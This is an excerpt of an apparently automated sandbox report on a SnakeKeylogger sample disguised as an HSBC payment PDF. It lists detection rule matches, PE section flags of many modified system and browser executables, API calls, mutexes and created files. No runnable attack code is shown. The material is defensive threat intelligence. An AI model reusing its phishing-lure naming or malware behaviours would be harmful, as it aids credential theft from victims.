              Source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: chrome_proxy.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: crashreporter.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler64.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdate.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateBroker.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: default-browser-agent.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateComRegisterShell64.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: firefox.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateCore.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateOnDemand.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: minidump-analyzer.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pingsender.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: plugin-container.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: private_browsing.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: updater.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jabswitch.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java-rmi.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javacpl.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jjs.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jp2launcher.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: keytool.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: kinit.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: klist.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ktab.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: orbd.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pack200.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: policytool.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmid.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmiregistry.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: servertool.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssvagent.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: tnameserv.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: unpack200.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ie_to_edge_stub.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: cookie_exporter.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: identity_helper.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
              Source: AdobeCollabSync.exe.4.drBinary string: @com.adobe.accp.review.v1\??\UNC\\\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\bisLoggingEnabled
              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@20/165@24/13
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Users\user\AppData\Roaming\9624e934681120d9.binJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-9624e934681120d99ea72c54-b
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9624e934681120d9-inf
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9624e934681120d99e7986a9-b
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut7315.tmpJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT content_item_relations.src_content_item_id, branches.download_state, content_items.creation_id,branches.content_item_id,branches.record_created, branches.modified, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content, (select 1 from branches where branch_name = 'conflict' AND content_item_id = :id) as is_conflicted,(SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND branches.content_item_id = :id AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base' AND branches.content_item_id = :id))))) as is_sync_pending, (SELECT resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN resource_content ON (resource_revisions.hash = resource_content.resource_content_id) WHERE( branches.content_item_id = :id AND branches.branch_name = 'error' AND branches.app_id = :appId)) as error_payload FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources ON (branches.content_item_revision
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: UPDATE branches SET content_item_revision_id = :contentItemRevisionId, modified = :modified, download_state = :downloadState WHERE( content_item_id = :contentItemId AND branch_name = :branchName AND app_id = :appId);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS resource_content ( resource_content_id TEXT PRIMARY KEY NOT NULL, resource_content TEXT NOT NULL);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: INSERT INTO content_items( creation_id, asset_id, type, content_item_type, created, removed_from_server, pending_local_delete) VALUES( :creationId, :assetId, :type, :contentItemType, :created, :removedFromServer, :pendingLocalDelete);
              Source: AdobeCollabSync.exe.4.dr | Binary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests WHERE( request_type = :requestType);
